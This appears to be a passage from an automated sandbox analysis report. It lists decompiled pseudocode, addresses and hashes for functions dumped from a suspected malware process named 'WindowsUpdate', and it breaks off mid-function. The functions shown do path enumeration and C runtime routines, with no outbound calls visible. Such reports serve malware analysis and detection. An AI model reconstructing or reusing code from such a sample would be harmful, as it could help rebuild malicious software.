                                                                                                                    • Instruction ID: 21ba91c65da1b85d368757c999fb8d92a94fac53faa98480380bbb52b0b37d65
                                                                                                                    • Opcode Fuzzy Hash: ce6aae9b49ed4f2fd07869c2a7d86244dfa9258787175d0d58d33f75fd344ad8
                                                                                                                    • Instruction Fuzzy Hash: 3F414771E01B15DBEB129FA9E8C579CB7B4BF00329F25832CE529AB2D0C77498408B84
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 002D0957 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 340COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 76%
                                                                                                                    			E002D0957(void* __ebx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a12) {
				signed int _v8;
				char _v12;
				intOrPtr _v16;
				char _v24;
				short _v28;
				intOrPtr _v32;
				char _v40;
				short _v44;
				intOrPtr _v48;
				char _v56;
				char _v72;
				char _v592;
				char _v10831;
				char _v10832;
				char _v15832;
				char _v26072;
				char _v26076;
				char _v26080;
				void* __edi;
				void* __esi;
				void* _t97;
				void* _t102;
				void* _t108;
				intOrPtr* _t110;
				char _t112;
				void* _t117;
				void* _t121;
				void* _t130;
				intOrPtr _t131;
				void* _t135;
				signed int _t136;
				void* _t143;
				void* _t153;
				intOrPtr _t156;
				intOrPtr _t159;
				intOrPtr* _t160;
				intOrPtr* _t162;
				intOrPtr* _t163;
				intOrPtr _t166;
				void* _t169;
				intOrPtr _t170;
				void* _t171;
				void* _t174;
				void* _t175;
				void* _t176;
				signed int _t177;
				void* _t178;
				void* _t179;
				void* _t180;
				void* _t181;
				void* _t182;
				void* _t183;
				void* _t184;

				_t166 = __edx;
				_t155 = __ebx;
				E00327307(0x65dc);
				_v8 =  *0x481f80 ^ _t177;
				asm("movq xmm0, [0x47221c]");
				_v16 =  *0x472224;
				_v12 =  *0x472228;
				_v32 =  *0x472234;
				asm("movq [ebp-0x14], xmm0");
				asm("movq xmm0, [0x47222c]");
				_v28 =  *0x472238 & 0x0000ffff;
				_t173 = _a4;
				asm("movq [ebp-0x24], xmm0");
				asm("movq xmm0, [0x47223c]");
				_v48 =  *0x472244;
				asm("movq [ebp-0x34], xmm0");
				asm("movq xmm0, [0x47224c]");
				_v44 =  *0x472248 & 0x0000ffff;
				asm("movq [ebp-0x44], xmm0");
				asm("movq xmm0, [0x472254]");
				_t168 = 3;
				asm("movq [ebp-0x3c], xmm0");
				_v26076 = 3;
				E00327AF9( &_v592, 0x208, _a4);
				E00327B4E( &_v592, 0x208,  &_v72);
				_t179 = _t178 + 0x18;
				_push( &_v592);
				if( *0x47011c() == 0xffffffff) {
					 *0x470124();
					E00327AF9( &_v592, 0x208, _t173);
					E00327B4E( &_v592, 0x208,  &_v56);
					_t97 = E002D1127( &_v592);
					_t180 = _t179 + 0x1c;
					if(_t97 != 0) {
						L9:
						_t99 = E002D1177( &_v10832, 0x2800);
						_t181 = _t180 + 8;
						if(_t99 != 0) {
							if(_t168 != 1) {
								if(_t168 != 2) {
									goto L26;
								} else {
									_t162 = 0x472260;
									_t136 =  &_v10832;
									while(1) {
										_t166 =  *_t136;
										if(_t166 !=  *_t162) {
											goto L24;
										}
										if(_t166 == 0) {
											goto L23;
										} else {
											_t166 =  *((intOrPtr*)(_t136 + 1));
											if(_t166 !=  *((intOrPtr*)(_t162 + 1))) {
												goto L24;
											} else {
												_t136 = _t136 + 2;
												_t162 = _t162 + 2;
												if(_t166 != 0) {
													continue;
												} else {
													goto L23;
												}
											}
										}
										goto L25;
									}
									goto L24;
								}
							} else {
								_t163 = 0x47225c;
								_t136 =  &_v10832;
								while(1) {
									_t166 =  *_t136;
									if(_t166 !=  *_t163) {
										break;
									}
									if(_t166 == 0) {
										L23:
										_t99 = 0;
									} else {
										_t166 =  *((intOrPtr*)(_t136 + 1));
										if(_t166 !=  *((intOrPtr*)(_t163 + 1))) {
											break;
										} else {
											_t136 = _t136 + 2;
											_t163 = _t163 + 2;
											if(_t166 != 0) {
												continue;
											} else {
												_t99 = 0;
											}
										}
									}
									L25:
									if(_t99 == 0) {
										L26:
										_t102 = E002D1177( &_v10832, 0x2800);
										_t182 = _t181 + 8;
										if(_t102 != 0) {
											do {
												_t160 =  &_v10832;
												_t166 = _t160 + 1;
												do {
													_t131 =  *_t160;
													_t160 = _t160 + 1;
												} while (_t131 != 0);
												_t161 = _t160 == _t166;
												if(_t160 == _t166 || _v10832 != 0x2e) {
													goto L31;
												}
												goto L32;
												L31:
												E002CBE37(_t161,  &_v10832);
												_t135 = E002D1177( &_v10832, 0x2800);
												_t182 = _t182 + 0xc;
											} while (_t135 != 0);
										}
										L32:
										_t99 = E002D1177( &_v10832, 0x2800);
										_t183 = _t182 + 8;
										if(_t99 != 0) {
											_push(_t155);
											do {
												E00327AF9( &_v15832, 0x1388,  &_v10832);
												_t156 = 0;
												_t175 = 0;
												_t108 = E002D1177( &_v10832, 0x2800);
												_t184 = _t183 + 0x14;
												if(_t108 != 0) {
													do {
														_t110 =  &_v10832;
														_t166 = _t110 + 1;
														do {
															_t159 =  *_t110;
															_t110 = _t110 + 1;
														} while (_t159 != 0);
														if(_t110 - _t166 < 3) {
															L40:
															_t112 = _v10832;
															if(_t112 == 0x2e) {
																goto L56;
															} else {
																if(_t168 < 2 || _t175 != 2) {
																	if(_t112 != 0x2a) {
																		E00327AF9( &_v26072, 0x2800,  &_v10832);
																		_t117 = E002D1177( &_v10832, 0x2800);
																		_t184 = _t184 + 0x14;
																		_t170 = 0;
																	} else {
																		E00327AF9( &_v26072, 0x2800,  &_v10831);
																		_t117 = E002D1177( &_v10832, 0x2800);
																		_t184 = _t184 + 0x14;
																		_t170 = 1;
																	}
																	if(_t117 == 0) {
																		goto L56;
																	} else {
																		_v26080 = 0;
																		_t99 = E002D0637(_t156, _t166, _t170,  &_v10832,  &_v26080);
																		_t184 = _t184 + 8;
																		if(_t99 == 1) {
																			if(_t170 != 0) {
																				if(_t156 != 0) {
																					_t122 = _v26080;
																					if(_v26080 != 0) {
																						E002CEF07(_a12,  &_v15832, _t156, _t122);
																						_t184 = _t184 + 0x10;
																					}
																				}
																			} else {
																				_t156 = _v26080;
																			}
																			_t168 = _v26076;
																			_t175 = _t175 + 1;
																			goto L55;
																		}
																	}
																} else {
																	_t175 = 0;
																	goto L55;
																}
															}
														} else {
															_t130 = E0032A4C7( &_v10832, 0x472264, 3);
															_t184 = _t184 + 0xc;
															if(_t130 == 0) {
																goto L55;
															} else {
																goto L40;
															}
														}
														goto L57;
														L55:
														_t121 = E002D1177( &_v10832, 0x2800);
														_t184 = _t184 + 8;
													} while (_t121 != 0);
												}
												goto L56;
												L56:
												_t99 = E002D1177( &_v10832, 0x2800);
												_t168 = _v26076;
												_t183 = _t184 + 8;
											} while (_t99 != 0);
											L57:
											_pop(_t155);
										}
									}
									goto L58;
								}
								L24:
								asm("sbb eax, eax");
								_t99 = _t136 | 0x00000001;
								goto L25;
							}
						}
					} else {
						E00327AF9( &_v592, 0x208, _t173);
						E00327B4E( &_v592, 0x208,  &_v40);
						_t143 = E002D1127( &_v592);
						_t180 = _t180 + 0x1c;
						if(_t143 != 0) {
							_t168 = 2;
							goto L8;
						} else {
							E00327AF9( &_v592, 0x208, _t173);
							E00327B4E( &_v592, 0x208,  &_v24);
							_t99 = E002D1127( &_v592);
							_t180 = _t180 + 0x1c;
							if(_t99 != 0) {
								_t168 = 1;
								L8:
								_v26076 = _t168;
								goto L9;
							}
						}
					}
					goto L58;
				} else {
					_push(0);
					_push(1);
					_v26076 = 0;
					if(E002D7A57( &_v592,  &_v26076) != 0) {
						L58:
						_pop(_t169);
						_pop(_t174);
						return E003272F2(_t99, _t155, _v8 ^ _t177, _t166, _t169, _t174);
					} else {
						E002D0797(__ebx, 3, _v26076, _a12);
						_t153 = E002D4A77(__ebx, _t173, _v26076);
						_pop(_t171);
						_pop(_t176);
						return E003272F2(_t153, __ebx, _v8 ^ _t177, _t166, _t171, _t176);
					}
				}
			}
























































                                                                                                                    0x002d0957
                                                                                                                    0x002d0957
                                                                                                                    0x002d095f
                                                                                                                    0x002d096b
                                                                                                                    0x002d0973
                                                                                                                    0x002d097b
                                                                                                                    0x002d0983
                                                                                                                    0x002d098b
                                                                                                                    0x002d0995
                                                                                                                    0x002d099a
                                                                                                                    0x002d09a2
                                                                                                                    0x002d09ac
                                                                                                                    0x002d09af
                                                                                                                    0x002d09b4
                                                                                                                    0x002d09bc
                                                                                                                    0x002d09c7
                                                                                                                    0x002d09cc
                                                                                                                    0x002d09d5
                                                                                                                    0x002d09d9
                                                                                                                    0x002d09de
                                                                                                                    0x002d09f1
                                                                                                                    0x002d09f7
                                                                                                                    0x002d09fc
                                                                                                                    0x002d0a02
                                                                                                                    0x002d0a17
                                                                                                                    0x002d0a1c
                                                                                                                    0x002d0a25
                                                                                                                    0x002d0a2f
                                                                                                                    0x002d0a89
                                                                                                                    0x002d0a9c
                                                                                                                    0x002d0ab1
                                                                                                                    0x002d0abd
                                                                                                                    0x002d0ac2
                                                                                                                    0x002d0ac7
                                                                                                                    0x002d0b57
                                                                                                                    0x002d0b63
                                                                                                                    0x002d0b68
                                                                                                                    0x002d0b6d
                                                                                                                    0x002d0b76
                                                                                                                    0x002d0baa
                                                                                                                    0x00000000
                                                                                                                    0x002d0bac
                                                                                                                    0x002d0bac
                                                                                                                    0x002d0bb1
                                                                                                                    0x002d0bb7
                                                                                                                    0x002d0bb7
                                                                                                                    0x002d0bbb
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x002d0bbf
                                                                                                                    0x00000000
                                                                                                                    0x002d0bc1
                                                                                                                    0x002d0bc1
                                                                                                                    0x002d0bc7
                                                                                                                    0x00000000
                                                                                                                    0x002d0bc9
                                                                                                                    0x002d0bc9
                                                                                                                    0x002d0bcc
                                                                                                                    0x002d0bd1
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x002d0bd1
                                                                                                                    0x002d0bc7
                                                                                                                    0x00000000
                                                                                                                    0x002d0bbf
                                                                                                                    0x00000000
                                                                                                                    0x002d0bb7
                                                                                                                    0x002d0b78
                                                                                                                    0x002d0b78
                                                                                                                    0x002d0b7d
                                                                                                                    0x002d0b87
                                                                                                                    0x002d0b87
                                                                                                                    0x002d0b8b
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x002d0b8f
                                                                                                                    0x002d0bd3
                                                                                                                    0x002d0bd3
                                                                                                                    0x002d0b91
                                                                                                                    0x002d0b91
                                                                                                                    0x002d0b97
                                                                                                                    0x00000000
                                                                                                                    0x002d0b99
                                                                                                                    0x002d0b99
                                                                                                                    0x002d0b9c
                                                                                                                    0x002d0ba1
                                                                                                                    0x00000000
                                                                                                                    0x002d0ba3
                                                                                                                    0x002d0ba3
                                                                                                                    0x002d0ba3
                                                                                                                    0x002d0ba1
                                                                                                                    0x002d0b97
                                                                                                                    0x002d0bdc
                                                                                                                    0x002d0bde
                                                                                                                    0x002d0be4
                                                                                                                    0x002d0bf0
                                                                                                                    0x002d0bf5
                                                                                                                    0x002d0bfa
                                                                                                                    0x002d0bfc
                                                                                                                    0x002d0bfc
                                                                                                                    0x002d0c02
                                                                                                                    0x002d0c07
                                                                                                                    0x002d0c07
                                                                                                                    0x002d0c09
                                                                                                                    0x002d0c0a
                                                                                                                    0x002d0c0e
                                                                                                                    0x002d0c10
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x002d0c1b
                                                                                                                    0x002d0c22
                                                                                                                    0x002d0c33
                                                                                                                    0x002d0c38
                                                                                                                    0x002d0c3b
                                                                                                                    0x002d0bfc
                                                                                                                    0x002d0c3f
                                                                                                                    0x002d0c4b
                                                                                                                    0x002d0c50
                                                                                                                    0x002d0c55
                                                                                                                    0x002d0c5b
                                                                                                                    0x002d0c67
                                                                                                                    0x002d0c7a
                                                                                                                    0x002d0c8b
                                                                                                                    0x002d0c8d
                                                                                                                    0x002d0c8f
                                                                                                                    0x002d0c94
                                                                                                                    0x002d0c99
                                                                                                                    0x002d0ca7
                                                                                                                    0x002d0ca7
                                                                                                                    0x002d0cad
                                                                                                                    0x002d0cb7
                                                                                                                    0x002d0cb7
                                                                                                                    0x002d0cb9
                                                                                                                    0x002d0cba
                                                                                                                    0x002d0cc3
                                                                                                                    0x002d0ce3
                                                                                                                    0x002d0ce3
                                                                                                                    0x002d0ceb
                                                                                                                    0x00000000
                                                                                                                    0x002d0cf1
                                                                                                                    0x002d0cf4
                                                                                                                    0x002d0d04
                                                                                                                    0x002d0d4c
                                                                                                                    0x002d0d5d
                                                                                                                    0x002d0d62
                                                                                                                    0x002d0d65
                                                                                                                    0x002d0d06
                                                                                                                    0x002d0d19
                                                                                                                    0x002d0d2a
                                                                                                                    0x002d0d2f
                                                                                                                    0x002d0d32
                                                                                                                    0x002d0d32
                                                                                                                    0x002d0d69
                                                                                                                    0x00000000
                                                                                                                    0x002d0d6b
                                                                                                                    0x002d0d79
                                                                                                                    0x002d0d83
                                                                                                                    0x002d0d88
                                                                                                                    0x002d0d8e
                                                                                                                    0x002d0d92
                                                                                                                    0x002d0d9e
                                                                                                                    0x002d0da0
                                                                                                                    0x002d0da8
                                                                                                                    0x002d0db6
                                                                                                                    0x002d0dbb
                                                                                                                    0x002d0dbb
                                                                                                                    0x002d0da8
                                                                                                                    0x002d0d94
                                                                                                                    0x002d0d94
                                                                                                                    0x002d0d94
                                                                                                                    0x002d0dbe
                                                                                                                    0x002d0dc4
                                                                                                                    0x00000000
                                                                                                                    0x002d0dc4
                                                                                                                    0x002d0d8e
                                                                                                                    0x002d0cfb
                                                                                                                    0x002d0cfb
                                                                                                                    0x00000000
                                                                                                                    0x002d0cfb
                                                                                                                    0x002d0cf4
                                                                                                                    0x002d0cc5
                                                                                                                    0x002d0cd3
                                                                                                                    0x002d0cd8
                                                                                                                    0x002d0cdd
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x002d0cdd
                                                                                                                    0x00000000
                                                                                                                    0x002d0dc5
                                                                                                                    0x002d0dd1
                                                                                                                    0x002d0dd6
                                                                                                                    0x002d0dd9
                                                                                                                    0x002d0ca7
                                                                                                                    0x00000000
                                                                                                                    0x002d0de1
                                                                                                                    0x002d0ded
                                                                                                                    0x002d0df2
                                                                                                                    0x002d0df8
                                                                                                                    0x002d0dfb
                                                                                                                    0x002d0e03
                                                                                                                    0x002d0e03
                                                                                                                    0x002d0e03
                                                                                                                    0x002d0c55
                                                                                                                    0x00000000
                                                                                                                    0x002d0bde
                                                                                                                    0x002d0bd7
                                                                                                                    0x002d0bd7
                                                                                                                    0x002d0bd9
                                                                                                                    0x00000000
                                                                                                                    0x002d0bd9
                                                                                                                    0x002d0b76
                                                                                                                    0x002d0acd
                                                                                                                    0x002d0ada
                                                                                                                    0x002d0aef
                                                                                                                    0x002d0afb
                                                                                                                    0x002d0b00
                                                                                                                    0x002d0b05
                                                                                                                    0x002d0b4c
                                                                                                                    0x00000000
                                                                                                                    0x002d0b07
                                                                                                                    0x002d0b14
                                                                                                                    0x002d0b29
                                                                                                                    0x002d0b35
                                                                                                                    0x002d0b3a
                                                                                                                    0x002d0b3f
                                                                                                                    0x002d0b45
                                                                                                                    0x002d0b51
                                                                                                                    0x002d0b51
                                                                                                                    0x00000000
                                                                                                                    0x002d0b51
                                                                                                                    0x002d0b3f
                                                                                                                    0x002d0b05
                                                                                                                    0x00000000
                                                                                                                    0x002d0a31
                                                                                                                    0x002d0a31
                                                                                                                    0x002d0a33
                                                                                                                    0x002d0a43
                                                                                                                    0x002d0a57
                                                                                                                    0x002d0e04
                                                                                                                    0x002d0e07
                                                                                                                    0x002d0e0a
                                                                                                                    0x002d0e13
                                                                                                                    0x002d0a5d
                                                                                                                    0x002d0a66
                                                                                                                    0x002d0a71
                                                                                                                    0x002d0a79
                                                                                                                    0x002d0a7a
                                                                                                                    0x002d0a88
                                                                                                                    0x002d0a88
                                                                                                                    0x002d0a57

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                    • Associated: 0000000C.00000002.333073063.00000000002C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_2c0000_WindowsUpdate.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: .$\"G$`"G
                                                                                                                    • API String ID: 0-3175736270
                                                                                                                    • Opcode ID: ea5b6cb9b53e8957100dbd267d18ea25f6a4621cf534d638f75f67bcf4c0e316
                                                                                                                    • Instruction ID: 7b92873bf38c2209d88d5e73383f9fb2eb5878fe8d2589fea0cb9ded4850a4a7
                                                                                                                    • Opcode Fuzzy Hash: ea5b6cb9b53e8957100dbd267d18ea25f6a4621cf534d638f75f67bcf4c0e316
                                                                                                                    • Instruction Fuzzy Hash: 40C1B472E1521996CB20DFA4CC85BDEB37DAF15304F1041E3E50CA7261EA72DEA5CB51
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 003B3A6D Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 95%
                                                                                                                    			E003B3A6D(signed int _a4, signed int _a8, signed int _a12, char _a16) {
				signed int _v8;
				signed int _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t49;
				signed int _t50;
				signed int _t53;
				void* _t57;
				signed int _t59;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t65;
				signed int _t70;
				signed int _t71;
				signed int _t73;
				signed int _t74;
				signed int _t79;
				signed int _t84;
				signed int _t87;
				signed int _t93;
				intOrPtr* _t97;
				void* _t98;

				_push(_t72);
				_t73 = _a8;
				if(_t73 == 0) {
					L4:
					_t50 = 0;
					L5:
					return _t50;
				}
				_t70 = _a12;
				if(_t70 == 0) {
					goto L4;
				}
				_t3 =  &_a16; // 0x474b58
				_t97 =  *_t3;
				if(_t97 != 0) {
					__eflags = _a4;
					if(_a4 == 0) {
						goto L3;
					}
					_t53 = _t49 | 0xffffffff;
					__eflags = _t70 - _t53 / _t73;
					if(_t70 > _t53 / _t73) {
						goto L3;
					}
					_t93 = _t73 * _t70;
					__eflags =  *(_t97 + 0xc) & 0x0000010c;
					_t71 = _t93;
					if(( *(_t97 + 0xc) & 0x0000010c) == 0) {
						_t74 = 0x1000;
					} else {
						_t74 =  *(_t97 + 0x18);
					}
					_v8 = _t74;
					__eflags = _t93;
					if(_t93 == 0) {
						L34:
						_t50 = _a12;
						goto L5;
					} else {
						do {
							_t84 =  *(_t97 + 0xc) & 0x00000108;
							__eflags = _t84;
							if(_t84 == 0) {
								L18:
								__eflags = _t71 - _t74;
								if(_t71 < _t74) {
									_t57 = E003B10E8( *_a4, _t97);
									__eflags = _t57 - 0xffffffff;
									if(_t57 == 0xffffffff) {
										L36:
										_t50 = (_t93 - _t71) / _a8;
										goto L5;
									}
									_a4 = _a4 + 1;
									_t74 =  *(_t97 + 0x18);
									_t71 = _t71 - 1;
									_v8 = _t74;
									__eflags = _t74;
									if(_t74 <= 0) {
										_t74 = 1;
										__eflags = 1;
										_v8 = 1;
									}
									goto L33;
								}
								__eflags = _t84;
								if(_t84 == 0) {
									L22:
									_t59 = _t71;
									__eflags = _t74;
									if(_t74 == 0) {
										_v12 = _t71;
									} else {
										_t59 = _t71 - _t59 % _t74;
										_v12 = _t59;
									}
									_push(_t59);
									_push(_a4);
									_push(E003B2BC8(_t97));
									_t61 = E003B97EF(_t71, _t93, _t97, __eflags);
									_t98 = _t98 + 0xc;
									__eflags = _t61 - 0xffffffff;
									if(_t61 == 0xffffffff) {
										L35:
										_t43 = _t97 + 0xc;
										 *_t43 =  *(_t97 + 0xc) | 0x00000020;
										__eflags =  *_t43;
										goto L36;
									} else {
										_t79 = _v12;
										_t87 = _t79;
										__eflags = _t61 - _t79;
										if(_t61 <= _t79) {
											_t87 = _t61;
										}
										_a4 = _a4 + _t87;
										_t71 = _t71 - _t87;
										__eflags = _t61 - _t79;
										if(_t61 < _t79) {
											goto L35;
										} else {
											L29:
											_t74 = _v8;
											goto L33;
										}
									}
								}
								_t62 = E003B2F3C(_t97);
								__eflags = _t62;
								if(_t62 != 0) {
									goto L36;
								}
								_t74 = _v8;
								goto L22;
							}
							_t63 =  *(_t97 + 4);
							_v12 = _t63;
							__eflags = _t63;
							if(__eflags == 0) {
								goto L18;
							}
							if(__eflags < 0) {
								goto L35;
							}
							__eflags = _t71 - _t63;
							if(_t71 < _t63) {
								_t63 = _t71;
								_v12 = _t71;
							}
							E003ABECC( *_t97, _a4, _t63);
							_t65 = _v12;
							 *(_t97 + 4) =  *(_t97 + 4) - _t65;
							 *_t97 =  *_t97 + _t65;
							_t98 = _t98 + 0xc;
							_t71 = _t71 - _t65;
							_a4 = _a4 + _t65;
							goto L29;
							L33:
							__eflags = _t71;
						} while (_t71 != 0);
						goto L34;
					}
				}
				L3:
				 *((intOrPtr*)(E003B0A4A())) = 0x16;
				E003B09DB();
				goto L4;
			}




























                                                                                                                    0x003b3a71
                                                                                                                    0x003b3a72
                                                                                                                    0x003b3a7a
                                                                                                                    0x003b3a9a
                                                                                                                    0x003b3a9a
                                                                                                                    0x003b3a9c
                                                                                                                    0x003b3aa0
                                                                                                                    0x003b3aa0
                                                                                                                    0x003b3a7c
                                                                                                                    0x003b3a81
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x003b3a83
                                                                                                                    0x003b3a83
                                                                                                                    0x003b3a88
                                                                                                                    0x003b3aa1
                                                                                                                    0x003b3aa5
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x003b3aa7
                                                                                                                    0x003b3aae
                                                                                                                    0x003b3ab0
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x003b3ab4
                                                                                                                    0x003b3ab7
                                                                                                                    0x003b3abe
                                                                                                                    0x003b3ac0
                                                                                                                    0x003b3ac7
                                                                                                                    0x003b3ac2
                                                                                                                    0x003b3ac2
                                                                                                                    0x003b3ac2
                                                                                                                    0x003b3acc
                                                                                                                    0x003b3acf
                                                                                                                    0x003b3ad1
                                                                                                                    0x003b3baa
                                                                                                                    0x003b3baa
                                                                                                                    0x00000000
                                                                                                                    0x003b3ad7
                                                                                                                    0x003b3ad7
                                                                                                                    0x003b3ada
                                                                                                                    0x003b3ada
                                                                                                                    0x003b3ae0
                                                                                                                    0x003b3b18
                                                                                                                    0x003b3b18
                                                                                                                    0x003b3b1a
                                                                                                                    0x003b3b82
                                                                                                                    0x003b3b89
                                                                                                                    0x003b3b8c
                                                                                                                    0x003b3bb6
                                                                                                                    0x003b3bbc
                                                                                                                    0x00000000
                                                                                                                    0x003b3bbc
                                                                                                                    0x003b3b8e
                                                                                                                    0x003b3b91
                                                                                                                    0x003b3b94
                                                                                                                    0x003b3b95
                                                                                                                    0x003b3b98
                                                                                                                    0x003b3b9a
                                                                                                                    0x003b3b9e
                                                                                                                    0x003b3b9e
                                                                                                                    0x003b3b9f
                                                                                                                    0x003b3b9f
                                                                                                                    0x00000000
                                                                                                                    0x003b3b9a
                                                                                                                    0x003b3b1c
                                                                                                                    0x003b3b1e
                                                                                                                    0x003b3b32
                                                                                                                    0x003b3b32
                                                                                                                    0x003b3b34
                                                                                                                    0x003b3b36
                                                                                                                    0x003b3b45
                                                                                                                    0x003b3b38
                                                                                                                    0x003b3b3e
                                                                                                                    0x003b3b40
                                                                                                                    0x003b3b40
                                                                                                                    0x003b3b48
                                                                                                                    0x003b3b49
                                                                                                                    0x003b3b53
                                                                                                                    0x003b3b54
                                                                                                                    0x003b3b59
                                                                                                                    0x003b3b5c
                                                                                                                    0x003b3b5f
                                                                                                                    0x003b3bb2
                                                                                                                    0x003b3bb2
                                                                                                                    0x003b3bb2
                                                                                                                    0x003b3bb2
                                                                                                                    0x00000000
                                                                                                                    0x003b3b61
                                                                                                                    0x003b3b61
                                                                                                                    0x003b3b64
                                                                                                                    0x003b3b66
                                                                                                                    0x003b3b68
                                                                                                                    0x003b3b6a
                                                                                                                    0x003b3b6a
                                                                                                                    0x003b3b6c
                                                                                                                    0x003b3b6f
                                                                                                                    0x003b3b71
                                                                                                                    0x003b3b73
                                                                                                                    0x00000000
                                                                                                                    0x003b3b75
                                                                                                                    0x003b3b75
                                                                                                                    0x003b3b75
                                                                                                                    0x00000000
                                                                                                                    0x003b3b75
                                                                                                                    0x003b3b73
                                                                                                                    0x003b3b5f
                                                                                                                    0x003b3b21
                                                                                                                    0x003b3b27
                                                                                                                    0x003b3b29
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x003b3b2f
                                                                                                                    0x00000000
                                                                                                                    0x003b3b2f
                                                                                                                    0x003b3ae2
                                                                                                                    0x003b3ae5
                                                                                                                    0x003b3ae8
                                                                                                                    0x003b3aea
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x003b3aec
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x003b3af2
                                                                                                                    0x003b3af4
                                                                                                                    0x003b3af6
                                                                                                                    0x003b3af8
                                                                                                                    0x003b3af8
                                                                                                                    0x003b3b01
                                                                                                                    0x003b3b06
                                                                                                                    0x003b3b09
                                                                                                                    0x003b3b0c
                                                                                                                    0x003b3b0e
                                                                                                                    0x003b3b11
                                                                                                                    0x003b3b13
                                                                                                                    0x00000000
                                                                                                                    0x003b3ba2
                                                                                                                    0x003b3ba2
                                                                                                                    0x003b3ba2
                                                                                                                    0x00000000
                                                                                                                    0x003b3ad7
                                                                                                                    0x003b3ad1
                                                                                                                    0x003b3a8a
                                                                                                                    0x003b3a8f
                                                                                                                    0x003b3a95
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • _memmove.LIBCMT ref: 003B3B01
                                                                                                                    • __flush.LIBCMT ref: 003B3B21
                                                                                                                      • Part of subcall function 003B0A4A: __getptd_noexit.LIBCMT ref: 003B0A4A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                    • Associated: 0000000C.00000002.333073063.00000000002C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_2c0000_WindowsUpdate.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: __flush__getptd_noexit_memmove
                                                                                                                    • String ID: DKG$XKG
                                                                                                                    • API String ID: 3662107617-347010430
                                                                                                                    • Opcode ID: 390950b32339667cebde76435ab0dbf8f2b25c6679f7891ecd0013c2f6afea22
                                                                                                                    • Instruction ID: 39a8807e59a46582884a26e46219ab72cd79c7216982b5441ed49d407825cabd
                                                                                                                    • Opcode Fuzzy Hash: 390950b32339667cebde76435ab0dbf8f2b25c6679f7891ecd0013c2f6afea22
                                                                                                                    • Instruction Fuzzy Hash: 6041B731700716AFDB1ACF69C8909EE7BA5EF84368B24863DE655CBA44DB70DF418B40
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 003B1235 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 125COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 82%
                                                                                                                    			E003B1235(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				intOrPtr* _v532;
				char _v533;
				signed int _v540;
				intOrPtr _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				intOrPtr _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v584;
				signed int _v588;
				char _v592;
				signed int _v596;
				intOrPtr _v600;
				signed int _v604;
				void* _v616;
				char _v624;
				intOrPtr _v628;
				char _v636;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t66;
				signed int _t69;
				intOrPtr* _t72;
				signed int _t75;
				signed int _t77;
				signed int _t80;
				void* _t86;
				char _t91;
				signed int _t93;
				signed int _t94;
				signed int _t97;
				void* _t103;
				signed int _t105;
				intOrPtr* _t108;
				void* _t109;
				signed int _t111;

				_v8 =  *0x482960 ^ _t111;
				_t108 = _a8;
				_v564 = _a4;
				_v532 = _t108;
				_v544 = _a16;
				_v596 = 0;
				_v540 = 0;
				_v572 = 0;
				_v556 = 0;
				_v568 = 0;
				_v588 = 0;
				_v576 = 0;
				E003AC510( &_v636, _a12);
				_v600 = E003B0A4A();
				_t66 = _v564;
				if(_t66 == 0) {
					L26:
					 *((intOrPtr*)(E003B0A4A())) = 0x16;
					_t69 = E003B09DB() | 0xffffffff;
				} else {
					if(( *(_t66 + 0xc) & 0x00000040) != 0) {
						L12:
						if(_t108 == 0) {
							goto L26;
						} else {
							_t91 =  *_t108;
							_t97 = 0;
							_v548 = 0;
							_v552 = 0;
							_v584 = 0;
							_v604 = 0;
							_v533 = _t91;
							_v592 = _t91;
							if(_t91 != 0) {
								_t72 = _v532;
								while(1) {
									_v532 = _t72 + 1;
									if(_t97 < 0) {
										goto L22;
									}
									_t41 = _t91 - 0x20; // 0x483620
									if(_t41 > 0x58) {
										_t75 = 0;
									} else {
